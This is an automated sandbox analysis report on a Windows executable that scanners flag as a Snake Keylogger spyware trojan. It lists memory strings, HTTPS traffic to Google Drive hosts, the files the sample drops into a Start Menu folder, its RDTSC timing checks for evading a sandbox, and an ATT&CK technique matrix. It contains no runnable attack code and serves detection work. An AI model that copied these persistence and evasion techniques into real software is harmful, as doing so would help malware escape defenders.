      Source: MNLS4PjscF.exe, 00000008.00000003.2001657231.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000002.2139939778.00000000078AD000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2053656397.000000000789E000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1975210550.00000000078B5000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2053656397.00000000078AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: MNLS4PjscF.exe, 00000008.00000003.2001657231.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000002.2139939778.00000000078AD000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2053656397.000000000789E000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1975210550.00000000078B5000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2053656397.00000000078AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: MNLS4PjscF.exe, 00000008.00000003.2053656397.00000000078B0000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000002.2139939778.00000000078B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.cok
      Source: MNLS4PjscF.exe, 00000008.00000003.2001657231.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000002.2139939778.00000000078AD000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2053656397.000000000789E000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1975210550.00000000078B5000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2053656397.00000000078AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: MNLS4PjscF.exe, 00000008.00000003.2001657231.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000002.2139939778.00000000078AD000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2053656397.000000000789E000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1975210550.00000000078B5000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2053656397.00000000078AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: MNLS4PjscF.exe, 00000008.00000003.2001657231.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000002.2139939778.00000000078AD000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2053656397.000000000789E000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1975210550.00000000078B5000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2053656397.00000000078AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
      Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
      Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
      Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
      Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
      Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
      Source: unknownNetwork traffic detected: HTTP traffic on port 49689 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
      Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.7:49688 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.7:49689 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.7:49693 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.7:49695 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.7:49699 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.7:49701 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.7:49703 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.7:49705 version: TLS 1.2
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeCode function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052D1
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeCode function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403358
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeCode function: 8_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,8_2_00403358
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeCode function: 0_2_00404B0E0_2_00404B0E
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeCode function: 0_2_0040653D0_2_0040653D
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeCode function: 8_2_00404B0E8_2_00404B0E
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeCode function: 8_2_0040653D8_2_0040653D
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeCode function: String function: 00402B38 appears 47 times
      Source: MNLS4PjscF.exe, 00000000.00000002.1550546239.000000000044D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametoggler triumvirates.exe4 vs MNLS4PjscF.exe
      Source: MNLS4PjscF.exe, 00000008.00000002.2132570087.000000000044D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametoggler triumvirates.exe4 vs MNLS4PjscF.exe
      Source: MNLS4PjscF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal84.troj.evad.winEXE@3/30@2/2
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeCode function: 0_2_004045C8 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045C8
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerneJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsmA3FE.tmpJump to behavior
      Source: MNLS4PjscF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: MNLS4PjscF.exeVirustotal: Detection: 66%
      Source: MNLS4PjscF.exeReversingLabs: Detection: 60%
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile read: C:\Users\user\Desktop\MNLS4PjscF.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\MNLS4PjscF.exe "C:\Users\user\Desktop\MNLS4PjscF.exe"
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeProcess created: C:\Users\user\Desktop\MNLS4PjscF.exe "C:\Users\user\Desktop\MNLS4PjscF.exe"
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeProcess created: C:\Users\user\Desktop\MNLS4PjscF.exe "C:\Users\user\Desktop\MNLS4PjscF.exe"Jump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Stalkingly\Udgyd.iniJump to behavior

      Data Obfuscation

      barindex
      Source: Yara matchFile source: Process Memory Space: MNLS4PjscF.exe PID: 7276, type: MEMORYSTR
      Source: Yara matchFile source: 00000000.00000002.1551650221.000000000A349000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeCode function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406252
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeCode function: 0_2_10002DB0 push eax; ret 0_2_10002DDE
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Users\user\AppData\Local\Temp\nsxBF78.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerneJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Skjoldbrusks.MoeJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Litiscontest.jpgJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Galmandsvrks.For231Jump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Tiggerstavens.fesJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\StalkinglyJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Stalkingly\Udgyd.iniJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Stalkingly\Udtrttede.iniJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Stalkingly\aktioners.jpgJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Stalkingly\begrdeliges.proJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Stalkingly\burdie.iniJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Stalkingly\cartographer.jpgJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Stalkingly\histographies.txtJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Stalkingly\icekhana.txtJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Stalkingly\manxman.jpgJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Stalkingly\modstaaet.jpgJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Stalkingly\musicianer.spiJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Stalkingly\ndder.jpgJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Stalkingly\romantiserendes.iniJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Stalkingly\semiquadrangle.iniJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Stalkingly\sugarcane.jpgJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Stalkingly\OrarianJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Stalkingly\Orarian\tinkle.jpgJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Stalkingly\Orarian\unagitatedness.txtJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeAPI/Special instruction interceptor: Address: A4072DE
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeAPI/Special instruction interceptor: Address: 68A72DE
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeRDTSC instruction interceptor: First address: A3A60AE second address: A3A60AE instructions: 0x00000000 rdtsc 0x00000002 test dx, bx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F09F886B447h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeRDTSC instruction interceptor: First address: 68460AE second address: 68460AE instructions: 0x00000000 rdtsc 0x00000002 test dx, bx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F09F8BB5887h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsxBF78.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\MNLS4PjscF.exe TID: 5052Thread sleep time: -80000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeCode function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405770
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeCode function: 0_2_0040622B FindFirstFileW,FindClose,0_2_0040622B
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeCode function: 8_2_0040276E FindFirstFileW,8_2_0040276E
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeCode function: 8_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_00405770
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeCode function: 8_2_0040622B FindFirstFileW,FindClose,8_2_0040622B
      Source: MNLS4PjscF.exe, 00000008.00000003.1770338681.000000000789E000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1898053327.000000000789E000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1820603100.000000000789E000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000002.2139939778.000000000789E000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2001657231.000000000789E000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2053656397.000000000789E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeAPI call chain: ExitProcess graph end nodegraph_0-4511
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeAPI call chain: ExitProcess graph end nodegraph_0-4516
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeCode function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406252
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeProcess created: C:\Users\user\Desktop\MNLS4PjscF.exe "C:\Users\user\Desktop\MNLS4PjscF.exe"Jump to behavior
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeCode function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F0A
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API
      1
      Registry Run Keys / Startup Folder
      11
      Process Injection
      11
      Masquerading
      OS Credential Dumping21
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading
      1
      Registry Run Keys / Startup Folder
      1
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Virtualization/Sandbox Evasion
      Remote Desktop Protocol1
      Clipboard Data
      3
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading
      11
      Process Injection
      Security Account Manager3
      File and Directory Discovery
      SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information
      NTDS23
      System Information Discovery
      Distributed Component Object ModelInput Capture14
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information
      LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      MNLS4PjscF.exe67%VirustotalBrowse
      MNLS4PjscF.exe61%ReversingLabsWin32.Spyware.Snakekeylogger
      MNLS4PjscF.exe100%AviraTR/AD.NsisInject.vqxpt
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsxBF78.tmp\System.dll0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://www.google.cok0%Avira URL Cloudsafe
      http://crl.microsof0%Avira URL Cloudsafe
      http://crl.micros0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      142.250.186.142
      truefalse
        high
        drive.usercontent.google.com
        142.250.186.33
        truefalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
